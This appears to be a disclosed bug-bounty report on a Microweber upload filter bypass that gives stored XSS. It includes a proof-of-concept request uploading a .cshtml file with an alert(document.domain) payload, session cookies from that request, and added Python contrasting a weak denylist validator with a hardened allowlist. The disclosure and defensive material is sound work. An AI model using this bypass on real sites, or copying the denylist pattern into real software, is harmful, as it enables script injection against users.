File upload filter bypass leading to stored XSS in microweber/microweber

Valid

Reported on

Mar 9th 2022


Description

A user can upload a .cshtml file containing an XSS payload through the media upload endpoint; the file is stored under userfiles/media and served back from the application's origin.

Proof of Concept

Log in to the demo portal with admin credentials at https://demo.microweber.org/demo/admin/

Navigate to the page-create functionality at https://demo.microweber.org/demo/admin/page/create

Intercept the picture upload request in Burp and modify it as below (a .cshtml extension in the name field and an XSS payload in the file body).

Sample POST request

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; mw-back-to-live-edit=true; show-sidebar-layouts=1; _ga=GA1.2.1990870926.1646662573; twk_uuid_599594841b1bed47ceb0520f={"uuid":"1.4gkrYx1pzbRZRQsvreYdgHaygG5EJY38fHOKxQz8FFKqX7uVHEiHATiTi6PECYDSbfVRQpTMHYk0YbGWZIKevu3luS32NQqhPAhdmzQ5EM9f6aPpZpmc8W8L174F1NvcgS2BLVxa8rgdUYdRPot","version":3,"domain":"microweber.org","ts":1646662604068}; laravel_session=Cgwk6v6SW3Pe44qMKD4mzhxN5Hkl7qPviYDYyL9k; csrf-token-data=%7B%22value%22%3A%22KLxn5nyDA3qx7MB7mvgGDPMDiip4h8GeY3wI9nza%22%2C%22expiry%22%3A1646839612227%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/page/create
Content-Length: 577
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjHgSED0Yg78agVSE
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="name"

a.cshtml
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryjHgSED0Yg78agVSE
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html

<div onmouseover="alert(document.domain)" style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></div>

------WebKitFormBoundaryjHgSED0Yg78agVSE--

Response

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 18:14:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 18:14:17 GMT
Connection: close
Content-Type: application/json
Content-Length: 129

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/a_11.cshtml","name":"a_11.cshtml","bytes_uploaded":"577"}


Impact

Stored XSS through file upload feature
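The root cause described above is an upload filter that lets a file with an unexpected extension and an HTML body through. The following added example (not Microweber's code; the validator, the sample multipart body and the illustrative denylist are all constructed for this demonstration) parses a multipart body shaped like the PoC request and runs it through two checks: an extension denylist that happens not to list .cshtml, which passes the upload, and an image allowlist that also verifies the file's magic bytes, which rejects it. It also returns the response headers a defender would set on anything served from a user-files directory so that a browser will not render stored content as a page even if a future filter gap appears.

```python
import re
from typing import Dict, Tuple

# Constructed multipart body mirroring the shape of the PoC request.
# The boundary and field values are sample data, not the original capture.
BOUNDARY = b"----WebKitFormBoundarySAMPLE"
SAMPLE_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="name"\r\n\r\n'
    b"a.cshtml\r\n"
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="file"; filename="blob"\r\n'
    b"Content-Type: text/html\r\n\r\n"
    b'<div onmouseover="alert(document.domain)"></div>\r\n'
    b"--" + BOUNDARY + b"--\r\n"
)

# Constructed minimal PNG prefix used as a benign control input.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

# Magic bytes for the image types an upload endpoint for pictures should accept.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXTS = frozenset(IMAGE_MAGIC)

# Illustrative denylist (hypothetical, not the project's actual filter): it omits
# .cshtml, which is exactly the gap a denylist approach invites.
DENIED_EXTS = frozenset({"php", "phtml", "html", "htm", "js", "svg"})


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser returning {field name: raw part body}."""
    parts: Dict[str, bytes] = {}
    delim = b"--" + boundary
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter reached
        head, _, data = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            parts[m.group(1).decode()] = data.rstrip(b"\r\n")
    return parts


def extension(name: str) -> str:
    """Lower-cased final extension of a user-supplied name ('' if none)."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def denylist_check(name: str) -> bool:
    """Weak pattern: accept unless the extension is on a blocklist."""
    return extension(name) not in DENIED_EXTS


def allowlist_check(name: str, data: bytes) -> Tuple[bool, str]:
    """Strong pattern: extension must be an allowed image type AND the bytes
    must start with that type's magic signature."""
    ext = extension(name)
    if ext not in ALLOWED_EXTS:
        return False, f"extension '.{ext}' is not an allowed image type"
    if not any(data.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, "file content does not match the claimed image type"
    return True, "ok"


def check_upload(body: bytes, boundary: bytes) -> Tuple[bool, str]:
    """Validate a multipart upload the way a hardened picture endpoint would."""
    parts = parse_multipart(body, boundary)
    name = parts.get("name", b"").decode(errors="replace")
    data = parts.get("file", b"")
    return allowlist_check(name, data)


def user_files_headers() -> Dict[str, str]:
    """Headers for serving anything under a user-files path: never let the
    browser sniff or render stored content as a document."""
    return {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    parts = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("denylist verdict:", denylist_check(parts["name"].decode()))
    print("allowlist verdict:", check_upload(SAMPLE_BODY, BOUNDARY))
```

Running the block shows the denylist returning True for a.cshtml (the upload goes through) while the allowlist rejects it on extension alone; a file renamed to a.png with the same HTML body is still rejected because the bytes do not begin with the PNG signature. The headers returned by user_files_headers() are a second layer: with nosniff and attachment disposition, a stored file is downloaded rather than rendered in the application's origin.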

Report timeline

We are processing your report and will contact the microweber team within 24 hours. a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Bozhidar Slaveykov validated this vulnerability a year ago
rajeshpatil013 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bozhidar Slaveykov marked this as fixed in 1.2.12 with commit 89200c a year ago
Bozhidar Slaveykov has been awarded the fix bounty
This vulnerability will not receive a CVE